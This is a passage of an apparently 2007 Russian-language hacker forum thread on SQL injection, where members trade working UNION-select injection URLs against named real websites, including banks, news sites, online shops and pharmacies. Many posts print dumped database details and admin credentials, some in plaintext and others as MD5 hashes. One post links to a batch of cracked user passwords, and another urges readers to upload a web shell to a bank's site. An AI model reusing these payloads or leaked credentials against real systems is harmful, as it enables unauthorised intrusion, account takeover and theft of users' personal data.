SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Национальный Банк Развития
    Также используя LOAD_FILE: /etc/networks, /etc/group, /etc/services, /etc/hosts, /etc/profile
    Version: 4.0.10-gamma
    User: root@localhost
     
    3 people like this.
  2. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    ;)

    код:

    http://www.zonanu.nu/anketa.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat_ws(0x3a,login,pass),34,35+from+u57027_2.osnova/*

    +

    http://www.paradiz.nu/news.php?id=-9+union+select+1,concat(login,0x3a,password),3,4+from+u57027_3.fs_admin/*

    всего их четыре сайта,но на всех одна и та-же бд


    ___________________________________________



    код:

    http://otdohni.nu/full_view.php?id=-130+union+select+1,concat(table_name,0x3a,column_name),3,4+from+information_schema.columns/*
    код:

    http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass),3,4+from+admins/*
    код:

    http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass,mail,tel),3,4+from+clients/*
    код:


    http://otdohni.nu/full_view.php?id=-130+union+select+1,concat_ws(0x3a,id,login,pass,mail,tel),3,4+from+users/*

    админка

    http://otdohni.nu/admin
    login/pass:
    xs7df9023fgh55:dsfgy877gfh7gv5h8m76gh



    :D
     
    1 person likes this.
  3. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    4.0.24_Debian-10sarge2-log
    obdesigualtats
    [email protected]

    4.1.22-standard
    phpvilla_php
    phpvilla_root@localhost

    4.1.20
    blog
    root@localhost
     
    #3283 NOmeR1, 12 Oct 2007
    Last edited: 12 Oct 2007
  4. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Пипец. nasa-academy.org <- 86 столбцов.
    5.0.26-max-log
    academy
    academy@localhost

    Блин, чё, наса не могут нанять нормальных спецов, чтобы сделали сайт без багов?
     
    2 people like this.
  5. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    Code:
    http://omsk.arsec.ru/modules/articles/article.php?id=1+union+select+1,2,3,4,5,6,concat(uname,0x3a,pass),8,9,1,2,3,4,5,6,7,8,9,1,2+from+u26773.ars_users+limit+1,1/*
    admin:48c7b8a13ce1f0fbbec213d87ebcda5e

    Расшифровал. :) (Пользователей:4996, Найдено:3220)
    http://rapidshare.com/files/62099632/hashes.rar.html
     
    2 people like this.
  6. WebeX

    WebeX New Member

    Joined:
    31 Mar 2007
    Messages:
    15
    Likes Received:
    4
    Reputations:
    -6
    http://www.0629.com.ua/view_news.php?id_news=
    Только не пойму чего с ней делать!
     
  7. valiko

    valiko Elder - Старейшина

    Joined:
    28 Jan 2007
    Messages:
    152
    Likes Received:
    144
    Reputations:
    19
    Code:
    http://www.house-ua.com/item.php?skin=kv_pr&id=-23468'+union+select+user(),version(),database()/*
     
  8. sulaspaka

    sulaspaka New Member

    Joined:
    2 Oct 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    помогите pаскрутит

    Code:
    http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,4,5/*
     
  9. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
    admin@localhost:5.0.27-log:runescape
    выводим количество таблиц
    Code:
    http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,count(table_name),5+from+information_schema.tables/*
    142, =///
    выводим таблицы, где есть колонка password
    Code:
    http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(table_schema,0x3a,table_name),5+from+information_schema.columns+where+column_name=char(112,97,115,115,119,111,1 14,100)+limit+0,1/*
    lotro:adds_users
    runescape:adds_users
    war:adds_users
    выводим, например, колонки из lotro:adds_users
    Code:
    http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(column_name),5+from+information_schema.columns+where+table_schema=char(108,111,116,114,111)+and+table_name=char(97,100 ,100,115,95,117,115,101,114,115)+limit+0,1/*
    user_id
    user_name
    password
    итд
    итд лимитом
     
    3 people like this.
  10. Underwit

    Underwit Banned

    Joined:
    6 Oct 2006
    Messages:
    191
    Likes Received:
    137
    Reputations:
    16
    www.uselessjunk.com

    ну тут всё понятно)

    админы

    Юзеры

    Админка

    www.uselessjunk.com/admin.php

    админы:
    id:name:pass

    1:admin:tigerwoods
    2:hoover:stile
    3:turtle:turtleuj2007
    4:matt:diabl0
     
    #3290 Underwit, 13 Oct 2007
    Last edited: 13 Oct 2007
    3 people like this.
  11. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    -------------удалено---боян--------------





    www.rare.ru

    http://www.rare.ru/show.php?index=-13+union+select+1,2,3,concat(version(),0x2F,database(),0x2F,user()),5/*

    5.0.45-log/rareru/[email protected]

    http://www.rare.ru/show.php?index=-13+union+select+1,2,3,table_name,table_schema+from+information_schema.tables/*

    Таблицы можно покопаться

    http://www.rare.ru/show.php?index=-13+union+select+1,2,3,pass,login+from+users/*

    логин\хеш
     
    #3291 ElteRUS, 13 Oct 2007
    Last edited by a moderator: 13 Oct 2007
    2 people like this.
  12. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(user(),0x3a,version( ),0x3a,database())/*&pi=1&PHPSESSID=
    [email protected]:4.1.22-standard:zero2
    Code:
    http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(username,0x3a,password)+f rom+users/*&pi=1&PHPSESSID=
    rootadmin:cd92a26534dba48cd785cdcc0b3e6bd1 итд.. <395
    Code:
    http://www.confidence-mag.com/story.php?id=-7+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,datab ase()),5,6,7,8,9,10,11,12,13,14,15,16/*
    [email protected]:4.0.23-Max-log:v115400
     
  13. _Master-

    _Master- Banned

    Joined:
    30 May 2007
    Messages:
    76
    Likes Received:
    64
    Reputations:
    13
    Code:
    http://www.yuretz.ru/prikol.php?id=-471+union+select+1,convert(version()+using+cp1251),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
     
    1 person likes this.
  14. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    z-chat.ru



    http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(version(),0x2F,database(),0x2F,user()),2/*

    4.0.25/zchatspb/zchatspb@local


    http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(login,0x2F,passwd,0x2F,icq),2+from+user/*

    логин\хеш\уин но там какой-то прикол с выводом .... наверно ограничение на длину строки .. хотя хз

    да, можно выводить отдельно логин хеш и уин но так не красиво )
     
    #3294 ElteRUS, 13 Oct 2007
    Last edited: 13 Oct 2007
  15. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    reporter.kherson.ua



    http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9/*

    5.0.32-Debian_7etch1-log:reporter:lsd@localhost


    http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,3,uname,5,6,7,pass,9+from+users+limit+7,1/*

    логин \ пароль
     
    1 person likes this.
  16. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://drugspharma.com/index.php?mod=cart&quantity=1&action=add&ID=-1+union+select+1,2,3,concat(user(),0x3a,version (),0x3a,database()),5,6,7, 8,9,10,11/*
    hunting_tkdph@localhost:4.1.22-standard:hunting_tkrx
    Code:
    http://refill-rx.net/index.php?mod=cart&quantity=1&action=add&ID=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,datab ase()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
    pdlweb@localhost:4.1.22-standard:pdlweb_Pharmacy
     
    1 person likes this.
  17. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    БашкомснабБанк
    Version:4.0.27-standard-log
    User:bashbank@localhost
    6 юзеров, все имеют доступ к обминке, среди которых:
    denis:72d0d440b5ebc3cb162bf2cbd0f680ee:za1og
    blair:098f6bcd4621d373cade4e832627b4f6:test

    Кто не боится, заливаем шелл ;)
     
    #3297 0nep@t0p, 14 Oct 2007
    Last edited: 14 Oct 2007
    2 people like this.
  18. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://bestposters.ru/main.php?cat=-70+union+select+1,2,concat(login,0x3a,password,0x3a,email),4,5+from+users+limit+1/*
    Шоп по продаже постеров.
    P.S: работаем через лимит )
     
    3 people like this.
  19. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    exactly.ru


    http://www.exactly.ru/?sub=-10'+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3/*

    5.0.27-log:catalog2:catalog2@localhost


    http://www.exactly.ru/?sub=-10'+union+select+1,table_name,3+from+information_schema.tables+limit+0,1/*

    Доступ к information_schema. Ничего интересного не нашел




    ma3da.ru


    http://www.ma3da.ru/news.php?news_id=-862+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16/*

    4.1.20-lk-log:ma3daru:ma3daru@localhost

    все запросы к таблицам отвергаются (
     
    1 person likes this.
  20. v1ru$

    v1ru$ Elder - Старейшина

    Joined:
    17 Mar 2007
    Messages:
    272
    Likes Received:
    196
    Reputations:
    17
    Моя первая найденная инъекция
    Code:
    http://www.gardenshop.ru/courier.php?CategoryId=-329+union+select+co  ncat(version(),0x3a,database(),0x3a,u ser()),2,3/*
    
    Раскрутите кто-нибудь,а то ничего не выходит(
    Code:
    http://www.gardenshop.ru/co urier.php?CategoryId=-329+union+select+1,table_name,3+from+information_sch  ema.tables+limit+31,1/*
    http://www.gardenshop.ru/courier.php?CategoryId=-329+union+select+1,co  lumn_ name,3+from+INFORMATION_SCHEMA.COLUMNS+where+table_name='Users'+limit+1,1/*
    
     
    1 person likes this.
Thread Status:
Not open for further replies.